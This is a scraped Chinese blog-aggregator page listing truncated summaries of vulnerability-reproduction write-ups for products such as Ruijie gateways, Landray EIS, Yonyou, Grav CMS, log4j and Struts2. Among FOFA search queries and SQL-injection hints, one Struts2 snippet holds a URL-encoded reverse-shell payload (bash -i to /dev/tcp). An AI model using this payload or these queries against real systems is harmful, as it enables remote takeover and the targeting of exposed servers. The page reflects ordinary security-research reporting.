E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
Typecho反序列化漏洞复现
世邦通信 SPON IP网络对讲广播系统后门账户
资产测绘icon_hash=“-1830859634”
漏洞复现
代码中可以看到,可以看到有固定写死的账户密码(脑子抽了一下。
keepb1ue
·
2024-01-10 23:57
漏洞复现
网络
tcp/ip
网络协议
安全
web安全
【
漏洞复现
】锐捷RG-UAC统一上网行为管理系统信息泄露漏洞
Nx01产品简介锐捷网络成立于2000年1月,原名实达网络,2003年更名,自成立以来,一直扎根行业,深入场景进行解决方案设计和创新,并利用云计算、SDN、移动互联、大数据、物联网、AI等新技术为各行业用户提供场景化的数字解决方案,助力全行业数字化转型升级。Nx02漏洞描述锐捷RG-UAC统一上网行为管理审计系统存在信息泄露漏洞,攻击者可以通过审查网页源代码获取到用户账号和密码,导致管理员用户认证
晚风不及你ღ
·
2024-01-10 22:10
【漏洞复现】
web安全
【
漏洞复现
】锐捷EG易网关cli.php后台命令执行漏洞
Nx01产品简介锐捷EG易网关是一款综合网关,由锐捷网络完全自主研发。它集成了先进的软硬件体系架构,配备了DPI深入分析引擎、行为分析/管理引擎,可以在保证网络出口高效转发的条件下,提供专业的流控功能、出色的URL过滤以及本地化的日志存储/审计服务。Nx02漏洞描述锐捷EG易网关cli.php存在后台命令执行漏洞,此漏洞需要权限,可搭配login.php命令执行漏洞获取登陆密码结合使用。Nx03产
晚风不及你ღ
·
2024-01-10 22:37
【漏洞复现】
web安全
宏景eHR fileDownLoad SQL注入
漏洞复现
eHRfileDownLoad接口处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息0x03复现环境FOFA:app="HJSOFT-HCM"0x04
漏洞复现
OidBoy_G
·
2024-01-10 22:24
漏洞复现
安全
web安全
蓝凌EIS智慧协同平台 ShowUserInfo.aspx SQL注入
漏洞复现
0x01产品简介蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能,旨在提升企业内部沟通、协作和信息共享的效率。0x02漏洞概述由于蓝凌EIS智慧协同平台ShowUserInfo.aspx接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。0x03复现环境FOFA:app="La
OidBoy_G
·
2024-01-10 22:23
漏洞复现
安全
web安全
用友移动管理系统 多处文件上传
漏洞复现
0x01产品简介用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。0x02漏洞概述用友移动管理系统/maportal/appmanager/uploadIcon.do、/mobsm/common/upload等接口存在任意文件上传漏洞,未经授权攻击者通过漏洞上传任意
OidBoy_G
·
2024-01-10 22:53
漏洞复现
web安全
安全
仿蓝奏云网盘 /file/list SQL注入
漏洞复现
0x01产品简介仿蓝奏网盘是一种类似于百度网盘的文件存储和共享解决方案。它为用户提供了一个便捷的平台,可以上传、存储和分享各种类型的文件,方便用户在不同设备之间进行文件传输和访问。0x02漏洞概述仿蓝奏云网盘/file/list接口处存在SQL注入漏洞,登录后台的攻击者可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,
OidBoy_G
·
2024-01-10 22:22
漏洞复现
安全
web安全
[
漏洞复现
]Grav CMS任意代码执行漏洞(CVE-2022-2073)
一、漏洞介绍GravCMS可以通过Twig来进行页面的渲染,使用了不安全的配置可以达到远程代码执行的效果,影响最新版v1.7.34以下的版本二、
漏洞复现
春秋云境.com一键梭哈开启场
free key
·
2024-01-10 18:52
漏洞复现
春秋云境靶场
安全
[
漏洞复现
]Web Based Quiz System(CVE-2022-32991)
二、
漏洞复现
春秋云境.com一键梭哈,复制粘贴直接拿下开启场景“启动原神”ok,点完鼠标我们开始ctrl+c,ctrl+v这里加',会吧,不会退学吧这里加--+知道你们懒给你们打出来
free key
·
2024-01-10 18:52
漏洞复现
春秋云境靶场
安全
[
漏洞复现
]Apache Struts2/S2-012 RCE(CVE-2013-1965)
二、
漏洞复现
春秋云境.com一键梭哈,复制粘贴直接拿下name=%25%7B%28%23cmd%3D%27bash+-i+%3E%26+%2Fdev%2Ftcp%2Fip%2Fpor
free key
·
2024-01-10 18:52
漏洞复现
春秋云境靶场
apache
struts
[
漏洞复现
]Apache_log4j2(CVE-2021-44228)
安全公告编号:CNTA-2021-00322021年12月10日,国家信息安全漏洞共享平台(CNVD)收录了ApacheLog4j2远程代码执行漏洞(CNVD-2021-95914)。攻击者利用该漏洞,可在未授权的情况下远程执行代码。目前,漏洞利用细节已公开,Apache官方已发布补丁修复该漏洞。CNVD建议受影响用户立即更新至最新版本,同时采取防范性措施避免漏洞攻击威胁。一、漏洞情况分析Apac
free key
·
2024-01-10 18:22
漏洞复现
春秋云境靶场
apache
log4j
jvm基础第三节:
与
方法
专门承担类变量的初始化工作)方法的内容:所有的类变量初始化语句和类型的静态初始化器类的初始化时机:即在java代码中首次主动使用的时候,包含以下情形:-(首次)创建某个类的新实例时--new,反射,克隆或
反序列化
dimdark
·
2024-01-10 18:19
全版本Windows RCE
漏洞复现
CVE-2023-36025
漏洞简介CVE-2023-36025是微软于11月补丁日发布的安全更新中修复WindowsSmartScreen安全功能绕过漏洞。攻击者可以通过诱导用户单击特制的URL来利用该漏洞,对目标系统进行攻击。成功利用该漏洞的攻击者能够绕过WindowsDefenderSmartScreen检查及其相关提示。该漏洞的攻击复杂性较低,可创建并诱导用户点击恶意设计的Internet快捷方式文件(.URL)或指
网安老伯
·
2024-01-10 16:18
windows
web安全
安全
网络安全
网络协议
xss
ddos
drf-02-序列化器、数据验证(is_valid())、保存数据(create,save)、更新数据(update)、模型类序列化器、视图相关(APIView)
一、序列化器-Serializer序列化,序列化器会把模型对象转换成字典,经过response以后变成json字符串
反序列化
,把客户端发送过来的数据,经过request以后变成字典,序列化器可以把字典转成模型
反序列化
Hi-CWJ
·
2024-01-10 12:33
7DRF
drf
serializer
序列化器
APIView
【
漏洞复现
】锐捷EG易网关login.php命令注入漏洞
Nx01产品简介锐捷EG易网关是一款综合网关,由锐捷网络完全自主研发。它集成了先进的软硬件体系架构,配备了DPI深入分析引擎、行为分析/管理引擎,可以在保证网络出口高效转发的条件下,提供专业的流控功能、出色的URL过滤以及本地化的日志存储/审计服务。Nx02漏洞描述锐捷EG易网关login.php存在CLI命令注入,导致管理员账号密码泄露漏洞。Nx03产品主页fofa-query:app="Rui
晚风不及你ღ
·
2024-01-10 10:05
【漏洞复现】
web安全
Android Serializable 和 Parcelable 的详解以及代码示例(Kotlin)
1.Serializable和Parcelable的区别(简单记忆):Serializable适用于简单的对象序列化,而Parcelable适用于需要更高效的对象序列化和
反序列化
的情况,特别是在Android
jiet_h
·
2024-01-10 10:01
Android
夯实基础
android
kotlin
开发语言
Hive之set参数大全-4
F指定在使用FETCH命令提取查询结果时的序列化/
反序列化
器hive.fetch.output.serde是Hive的一个配置参数,用于指定在使用FETCH命令提取查询结果时的序列化/
反序列化
器。
OnePandas
·
2024-01-10 09:28
Hive
hive
hadoop
大数据
protobuf 学习笔记
反序列化
:在其他的计算环境中,将序列化后的数据还原为结构数据和对象。下面是一个简单的使用示例:messageSearchRequest{requiredstringquery=1;optional
sober_me
·
2024-01-10 05:09
分布式
学习
笔记
java
LCM源代码之Type Language(一)_转:
它提供了publish/subscribe消息的机制,数据序列化和
反序列化
的代码自动生成工具。它出自MITDARPAUrbanChallengeT
mahui85
·
2024-01-10 03:11
哈希算法
算法
网安面试三十到题(结束)
121有文件上传了漏洞了,linux下怎么找xx.conf的文件目录遍历,目录扫描122
反序列化
漏洞原理##你要把别人序列化好的文件进行
反序列化
进行利用,但是在序列化的过程中,被别人注入了攻击代码、魔法函数之类的
什么都好奇
·
2024-01-09 23:08
面试
安全
职场和发展
金和OA C6 upload_json 任意文件上传漏洞
资产测绘app=“Jinher-OA”
漏洞复现
POST/c6/KindEditor1/asp/uploa
keepb1ue
·
2024-01-09 21:35
漏洞复现
web安全
安全
世邦spon IP网络对讲广播系统任意文件上传漏洞
漏洞描述sponIP网络对讲广播系统存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限资产测绘icon_hash=“-1830859634”
漏洞复现
POST/upload
keepb1ue
·
2024-01-09 21:34
漏洞复现
网络
安全
web安全
某 E-Office v9 任意文件上传【
漏洞复现
实战】
image一、前言由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。本文章中的漏洞均为公开的漏洞收集,如果文章中的漏洞出现敏感内容产生了部分影响,请及时联系作者,望谅解。二、漏洞原理本次复现漏洞为未公开漏洞CNVD-2021-49104,该漏洞是由于e-office其上传模块中用户输入部分未能妥善处理,攻击者可以构造恶意的上传数据包
H_00c8
·
2024-01-09 20:31
常用java代码大全-Java中的序列化(Serialization)
具体来说,它是将对象转换为字节流,以便可以将字节流写入文件或通过网络发送到另一个运行Java的机器,然后
反序列化
该字节流以重新创建原始对象。
crmeb服务商-肥仔全栈开发
·
2024-01-09 18:32
java
java
python
开发语言
LitJson-Json字符串转对像时:整型与字符串或字符串转:整型进的类型不一致的处理
问题描述今天说要的其中的这个api:JsonMapper.ToObject(json),这个api应该是大家很常用的了,它的作用是将jsonstring
反序列化
成一个类对象。要求一json结
阿海-程序员
·
2024-01-09 15:06
Unity开发实用干货
json
c#
litjson
基于Jackson自定义json数据的对象转换器
测试前端Long类型的代码实际显示效果2、解决方法在SpringBoot项目中,默认使用Jackson来序列化和
反序列化
json数据,针对上面的问题,决定采用自定义对象转换器的方式,在
原来是好奇心
·
2024-01-09 14:37
java
两行前端代码搞定bilibili链接转视频(支持wecenter,wordpress,discuz,
typecho
)
两行前端代码搞定所有网站的wordpress,discuz,
typecho
,wecenter的的bilibili链接转视频。
sl514
·
2024-01-09 10:25
HTML
致远OA getAjaxDataServlet XXE
漏洞复现
(QVD-2023-30027)
0x01产品简介致远互联-OA是数字化构建企业数字化协同运营中台,面向企业各种业务场景提供一站式大数据分析解决方案的协同办公软件。0x02漏洞概述致远互联-OAgetAjaxDataServlet接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。0x03影响范围V5/G6V6.0及以上全系列版本0x04复现环境FOFA:a
OidBoy_G
·
2024-01-09 08:45
漏洞复现
安全
web安全
广联达Linkworks DataExchange.ashx XXE
漏洞复现
0x01产品简介广联达LinkWorks(也称为GlinkLink或GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。0x02漏洞概述广联达LinkWorks/GB/LK/Document/DataExchange/DataExchange.ashx接口处存
OidBoy_G
·
2024-01-09 08:52
漏洞复现
安全
web安全
金和OA C6 HomeService.asmx SQL注入
漏洞复现
0x01产品简介金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。0x02漏洞概述金和OAC6HomeService.asmx接口处存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步
OidBoy_G
·
2024-01-09 08:52
漏洞复现
安全
web安全
广联达Linkworks GetAuthorizeKey.ashx 文件上传
漏洞复现
0x01产品简介广联达LinkWorks(也称为GlinkLink或GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。0x02漏洞概述由于广联达LinkWorks/Services/FileService/UserFiles/GetAuthorizeKey.
OidBoy_G
·
2024-01-09 08:22
漏洞复现
安全
web安全
金和OA C6 CarCardInfo.aspx SQL注入
漏洞复现
0x01产品简介金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。0x02漏洞概述金和OAC6CarCardInfo.aspx接口处存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步
OidBoy_G
·
2024-01-09 08:48
漏洞复现
安全
web安全
反序列化
,反射时,构造函数是否调用。
目录■反射,
反序列化
时,构造函数是否调用
反序列化
时,不被调用反射时,被调用■验证代码---
反序列化
PersonTest运行结果■验证代码---反射Person(反射)Test(反射)运行结果(反射)■扩展
sun0322
·
2024-01-09 06:02
java
python
开发语言
全程云OA ajax.ashx接口存在SQL注入漏洞 附POC软件
1.全程云OA简介微信公众号搜索:南风
漏洞复现
文库该文章南风
漏洞复现
文库公众号首发全程云办公自动化系统也是企事业单位的内部
sublime88
·
2024-01-09 05:24
漏洞复现
ajax
sql
前端
网络
web安全
安全
金蝶EAS pdfviewlocal.jsp接口存在任意文件读取漏洞 附POC软件
1.金蝶EAS简介微信公众号搜索:南风
漏洞复现
文库该文章南风
漏洞复现
文库公众号首发金蝶EASCloud采购管理系统是专业的采购平台管理系统2.漏洞描述金蝶EAS为集团型企业提供功能全面、性能稳定、
sublime88
·
2024-01-09 05:53
漏洞复现
java
开发语言
安全
web安全
网络
网络协议
uniapp支付功能实现
return{rechargeTypes:[],orderNo:'',price:'',isApp:false,style:{icon:{width:"50rpx",height:"50rpx"}},
typeCho
sed
失落村庄
·
2024-01-09 01:02
uni-app
C# xml序列化和
反序列化
问题有的项目使用webservice返回结果是xml,需要进行xml序列化和
反序列化
xml序列化相关特性C#中,XML序列化相关的特性主要包括:XmlIgnore:这个特性可以用来指示序列化过程忽略一个属性或一个字段
假装我不帅
·
2024-01-08 20:21
dotnet
c#
xml
java
天融信TOPSEC Cookie 远程命令执行
漏洞复现
声明本文仅用于技术交流,请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。一、漏洞概述天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie处存在RCE漏洞,会导致服务器失陷。二、漏洞环境搭建
故事讲予风听
·
2024-01-08 19:43
漏洞复现
网络安全
漏洞复现
【
漏洞复现
】Hikvision SPON IP网络对讲广播系统存在命令执行漏洞CVE-2023-6895
漏洞描述HikvisionIntercomBroadcastingSystem是中国海康威视(Hikvision)公司的一个对讲广播系统。HikvisionIntercomBroadcastingSystem是中国海康威视(Hikvision)公司的一个对讲广播系统。HikvisionIntercomBroadcastingSystem3.0.3_20201113_RELEASE(HIK)版本存在
丢了少年失了心1
·
2024-01-08 18:58
网络安全
web安全
渗透测试
漏洞复现
tcp/ip
网络协议
渗透测试
网络安全
【
漏洞复现
】Hikvision SPON IP网络对讲广播系统任意文件上传
漏洞描述IP网络对讲广播系统是一种基于IP网络的高效、可靠、智能的通信解决方案。它支持全双工语音通信、单呼/多呼、组呼/广播等多种通信模式,可以实现跨地域、跨网络的实时通讯。该系统具有灵活的群组管理、智能化的调度和优先级控制功能,可以满足各种场景下的紧急通讯和协作需求。同时,系统支持多种接入设备和应用程序,具有良好的可扩展性和互操作性。免责声明技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法
丢了少年失了心1
·
2024-01-08 18:23
网络安全
web安全
渗透测试
漏洞复现
网络协议
渗透测试
漏洞复现
网络安全
CVE-2021-21220 Chrome远程代码执行
漏洞复现
0x00简介GoogleChrome浏览器是一款由Google公司开发的网页浏览器,该浏览器基于其他开源软件撰写,包括WebKit,目标是提升稳定性、速度和安全性,并创造出简单且有效率的使用者界面。通过CVE-2021-21220漏洞,受害者通过未开沙箱机制的Chrome浏览器打开攻击者置入恶意代码的网页后就会执行攻击者想要执行的任意代码。微信作为腾讯公司发布的一款聊天工具。通过PC端微信用户可以
m0_56642842
·
2024-01-08 16:01
黑客
漏洞复现
网络安全
深度学习
设计模式之单例模式
单例模式1.单例模式的概述2.单例模式的代码1.饿汉式2.懒汉式3.存在的问题与解决方式1.序列化
反序列化
的破坏2.反射的破坏1.单例模式的概述1.单例模式(SingletonPattern)是Java
我就是我352
·
2024-01-08 15:34
设计模式
单例模式
redis配置RedisConfig实现序列化和
反序列化
依赖(对于RedisConfig文件中三份其中的有的能用到)1.2.732.7.5com.alibabafastjson${fastjson.version}org.springframework.bootspring-boot-starter-data-redis${redis.version}找了三个博客的(都copy过来了),有的没试,这个序列化就okpackageredis.com.con
YH_Nothing
·
2024-01-08 13:01
springboot
redis
java
redis
java
缓存
记一次Redis消息订阅序列化和
反序列化
的错误
JSON序列化,覆盖JDK序列化,便于中文查看,配置文件使用ConditionalOnProperty断言;3、Nacos动态配置;解决思路:1、查看Redis中存入的数据乱码,由此确定是Redis序列化和
反序列化
不匹配
编程爱好者熊浪
·
2024-01-08 11:31
所遇问题
redis
java
数据库
redis
反序列化
异常问题
项目场景:项目场景:账户用户列表页加载失败,前后端分离,后端调用接口能正常返回数据,但是前端不展示,让同事跟新代码却能正常显示问题描述:报错内容:{“success”:false,“message”:"Cannotdeserialize;nestedexceptionisorg.springframework.core.serializer.support.SerializationFailedE
一个努力搬砖的女程序员
·
2024-01-08 11:30
java
经验分享
redis
java redis 序列化_Redis序列化和
反序列化
小编典典什么原因导致
反序列化
问题?
新都萝莉控
·
2024-01-08 11:00
java
redis
序列化
idea的修改包名后导致redis
反序列化
deserialize异常问题
中间碰到各种问题,这里主要是记录一下redis
反序列化
deserialize异常问题。
qq_29127369
·
2024-01-08 11:59
项目bug
idea修改包名导致出现问题
【redis】
反序列化
失败
问题:其实是个低级错误,重写了redist序列器,使用fastjson作为redisvalue的序列化器,
反序列化
时异常,检查后,发现redis里HashMap里部分item的value值是json格式
肉夹馍yc
·
2024-01-08 11:59
Bug
redis
spring
boot
java
redis
反序列化
localDateTime报错
取出来时报错把DefaultTyping.NON_FINAL改成DefaultTyping.EVERYTHING因为LocalDateTime是final类型,NON_FINAL情况下缓存的值不带类型,故
反序列化
失败
rabbyte0hh
·
2024-01-08 11:57
java
数据库
redis
redis
反序列化
问题背景原因分析问题总结解决方案问题背景最近在项目中发现一个Redis客户端存入数字类型数据后读取报错的有趣问题,经排查将问题化简为测试用例如下:如上图所示,测试通过说明Long类型数据正常存入Redis后,赋值给Long类型变量或调用getClass方法都会抛出异常,具体异常信息为java.lang.ClassCastException:java.lang.Integercannotbecast
有马大树
·
2024-01-08 11:27
java
redis
开发语言
上一页
15
16
17
18
19
20
21
22
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他